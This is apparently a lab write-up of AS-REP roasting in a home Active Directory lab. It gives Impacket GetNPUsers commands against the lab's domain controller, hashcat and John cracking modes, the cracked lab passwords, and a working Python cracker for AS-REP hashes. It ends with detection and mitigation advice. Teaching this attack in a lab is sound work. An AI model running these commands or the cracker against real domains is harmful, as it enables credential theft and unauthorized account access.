AS-REP Roasting
This attack is possible when a domain account has Kerberos pre-authentication disabled (the DONT_REQ_PREAUTH bit, 0x400000, in userAccountControl, shown in ADUC as "Do Not Require Kerberos Pre-Authentication"). Normally the KDC only answers an AS-REQ after the client proves knowledge of the password by sending an encrypted timestamp. Without pre-authentication, anyone who can reach the DC can request a ticket for that account and receive an AS-REP whose encrypted part is protected by a key derived from the user's password. That blob can be taken offline and guessed against at leisure: no lockouts, no further traffic to the DC.
For this demo I'll be using my Active Directory lab project (DOA lab); check it out on my GitHub.
LAB DIAGRAM AND SPECS
Specifications
| VM Name | OS | IP Address | Role | Specs |
|---|---|---|---|---|
| DOA-DC | Windows Server 2019 | 10.0.2.7 (static) | Domain Controller | 4GB RAM, 50GB HDD |
| DOA-PC01 | Windows 10 Pro | 10.0.2.101 (DHCP) | Domain-joined client | 2GB RAM, 40GB HDD |
| DOA-PC02 | Windows 10 Pro | 10.0.2.100 (DHCP) | Domain-joined client | 2GB RAM, 40GB HDD |
| KALI | Kali Linux 6.18 | 10.0.2.250 (static) | Attack Machine | 4GB RAM, 80GB HDD |
domain name: doa.local
Attack Demo
Step 1 — Disable Pre-Authentication
On the domain controller, run the Disable-KerbPreAuth.ps1 script from the lab repo. It randomly selects 2 users under the "LabUsers" OU and sets the "Do Not Require Kerberos Pre-Authentication" flag on them.
Looks like ujack and kchimaev were randomly selected (natural selection, I guess). To verify, open each user's properties in Active Directory Users and Computers, Account tab, and confirm the "Do Not Require Kerberos Pre-Authentication" box is checked.
Step 2 — Install Impacket on Attack Machine
On the dedicated attack machine, install Impacket via pipx so its example scripts (GetNPUsers.py among them) land on your PATH:
python3 -m pipx install impacket
On Kali the same scripts also ship in the impacket-scripts package, where the command is named impacket-GetNPUsers.
Step 3 — Retrieve Hashes with GetNPUsers.py
GetNPUsers.py sends an AS-REQ with no pre-authentication data for each target user and, when the account has "Do Not Require Kerberos Pre-Authentication" set, the DC answers with an AS-REP. What you get back is not a stored password hash but the AS-REP's encrypted part (by default etype 23, RC4-HMAC keyed with the user's NT hash), which the script prints as a crackable `$krb5asrep$23$user@domain:...` line. You never need the user's password, and the DC cannot tell this request apart from a legitimate one except by logging it (event 4768 with Pre-Authentication Type 0).
Syntax:
GetNPUsers.py <domain>/<user> -dc-ip <x.x.x.x> -no-pass
Without -no-pass the script prompts for a password; pressing Enter works, but the flag makes the intent explicit. If you have many candidates, -usersfile takes a list of names, and -format hashcat or -format john plus -outputfile write the lines straight into a file for cracking.
Since both ujack and kchimaev had pre-authentication disabled, run:
GetNPUsers.py doa.local/ujack -dc-ip=10.0.2.7 -no-pass
GetNPUsers.py doa.local/kchimaev -dc-ip=10.0.2.7 -no-pass
Step 4 — Crack the Hashes
With the AS-REP hashes retrieved, crack them offline to recover the plaintext passwords. Both mainstream crackers understand the format: hashcat mode 18200 (Kerberos 5, etype 23, AS-REP) and John the Ripper's krb5asrep format. Each guess costs one MD4 (the NT hash) plus a few HMAC-MD5 and one RC4 operation, there is no salt, and nothing touches the DC, so the only thing protecting the account is the strength of its password. In this lab, the wordlist found both:
| User | Password |
|---|---|
| ujack | Changme123! |
| kchimaev | BorzBorz7 |
Outside the lab the fix is to clear the flag on every account that does not genuinely need it, give any remaining exception a long passphrase, and watch event 4768 for requests with Pre-Authentication Type 0 and RC4 (0x17) as the ticket encryption type.
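To make concrete what is being cracked and why no salt helps the attacker, here is an added, self-contained Python example. It is not code from the DOA lab, Impacket or hashcat. It simulates the DC's half of the exchange with RFC 4757 RC4-HMAC (etype 23, key usage 8), prints the line in the layout GetNPUsers uses for -format hashcat, and then does what a cracker does per guess: derive the NT hash, rebuild the RC4 key from the checksum, decrypt, and compare the HMAC. The EncASRepPart bytes, confounder, user name and wordlist are constructed stand-ins; the pure-Python MD4 is included because OpenSSL 3 builds often hide MD4 behind the legacy provider.

```python
"""AS-REP roasting end to end (added example, not DOA-lab or Impacket code).

The "DC" half is a simulation of RFC 4757 RC4-HMAC (etype 23, key usage 8);
the EncASRepPart bytes, confounder and wordlist below are constructed stand-ins.
"""
import hashlib
import hmac
import os
import struct
from typing import Optional

KEY_USAGE_AS_REP_ENC_PART = 8  # RFC 4120 7.5.1: AS-REP enc-part, under the client key


def md4(msg: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (OpenSSL 3 often hides MD4 in the legacy provider)."""
    rot = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19), range(16)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    padded = msg + b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", 8 * len(msg))
    for off in range(0, len(padded), 64):
        X = struct.unpack("<16I", padded[off:off + 64])
        a, b, c, d = state
        for f, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a = rot((a + f(b, c, d) + X[j] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles so the next step updates d, then c, then b
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); for etype 23 this is the Kerberos long-term key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):                       # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                          # keystream XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def dc_encrypt_enc_part(password: str, enc_as_rep_part: bytes, confounder: bytes):
    """Simulated KDC: with no pre-auth required it encrypts the AS-REP enc-part
    under the client's key. Returns (checksum, edata2) per RFC 4757."""
    k1 = hmac_md5(nt_hash(password), struct.pack("<I", KEY_USAGE_AS_REP_ENC_PART))
    checksum = hmac_md5(k1, confounder + enc_as_rep_part)  # K2 == K1 for etype 23
    k3 = hmac_md5(k1, checksum)
    return checksum, rc4(k3, confounder + enc_as_rep_part)


def asrep_hash_line(user: str, domain: str, checksum: bytes, edata2: bytes) -> str:
    """Layout GetNPUsers prints with -format hashcat (hashcat mode 18200)."""
    return f"$krb5asrep$23${user}@{domain}:{checksum.hex()}${edata2.hex()}"


def parse_asrep_hash(line: str):
    head, _, body = line.partition(":")
    _, tag, etype, principal = head.split("$")
    if tag != "krb5asrep" or etype != "23":
        raise ValueError("only RC4-HMAC (etype 23) AS-REP lines are handled here")
    user, domain = principal.split("@", 1)
    checksum_hex, edata2_hex = body.split("$")
    return user, domain, bytes.fromhex(checksum_hex), bytes.fromhex(edata2_hex)


def crack_asrep(line: str, wordlist) -> Optional[str]:
    """Per guess: 1 MD4 + 3 HMAC-MD5 + 1 RC4, no salt, no traffic to the DC."""
    _, _, checksum, edata2 = parse_asrep_hash(line)
    usage = struct.pack("<I", KEY_USAGE_AS_REP_ENC_PART)
    for candidate in wordlist:
        k1 = hmac_md5(nt_hash(candidate), usage)
        plaintext = rc4(hmac_md5(k1, checksum), edata2)  # confounder || EncASRepPart
        if hmac.compare_digest(hmac_md5(k1, plaintext), checksum):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed sample: 0x79 is the ASN.1 tag of EncASRepPart ([APPLICATION 25]); rest is filler.
    line = asrep_hash_line("kchimaev", "doa.local",
                           *dc_encrypt_enc_part("BorzBorz7", b"\x79" + b"\x00" * 40, os.urandom(8)))
    print(line)
    print("cracked:", crack_asrep(line, ["Password1", "Changme123!", "BorzBorz7"]))
```

Run it and you get a line shaped exactly like GetNPUsers output, followed by the recovered password. Real crackers add one more cheap filter before the HMAC compare (the decrypted bytes after the 8-byte confounder must start with the 0x79 ASN.1 tag), which is why the sample plaintext begins with that byte.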